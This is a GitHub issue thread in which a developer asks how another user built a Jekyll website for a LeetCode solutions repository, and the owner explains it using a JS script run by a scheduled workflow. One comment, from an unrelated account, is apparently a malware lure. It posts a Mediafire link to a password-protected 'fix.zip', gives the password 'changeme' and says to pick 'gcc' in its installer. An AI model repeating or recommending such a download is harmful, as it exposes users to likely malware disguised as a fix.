### ISSUE TITLE
Need Attention!!

### ISSUE THREAD

**Issue by yashksaini-coder** [Suvraneel/LeetCode#13]
Hi @Suvraneel Came across your profile when I was checking the GSSOC'24 contributors. I was amazed to find out what you did with your Leetcode solutions repository and I was hoping to achieve the same results with my leetcode solution [Repo](https://github.com/yashksaini-coder/August-Leetcode-Daily-2024) too. 

<br>

![image](https://github.com/user-attachments/assets/bbe068e5-fd00-46b0-9511-91704485d51d)

<br>

I would really like your help and guidance on doing the same. Looking forward to your response very soon.
BTW, Really loved your portfolio website.

Regards,

@yashksaini-coder

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Suvraneel** [comment]
Hi @yashksaini-coder ,
Glad to hear that.

For the Leetcode repo, turn on Jekyll website from deploy settings of repo... I had written a JS script you'll find inside the `scripts` directory...

It is run as a scheduled YAML cron job in `workflows` directory. 


PS - I was not a participant in GSSoC24 though, I was the Program Manager for GSSoC 2022 (arguably the most successful edition 😅), post which I act as advisory for later editions of all GS programs.

PPS - All my repos are open-source, feel free to use  any of the resource directly. I'm glad when it helps anyone.

**Comment by yashksaini-coder** [comment]
understood thanks for the help 😄 
@Suvraneel
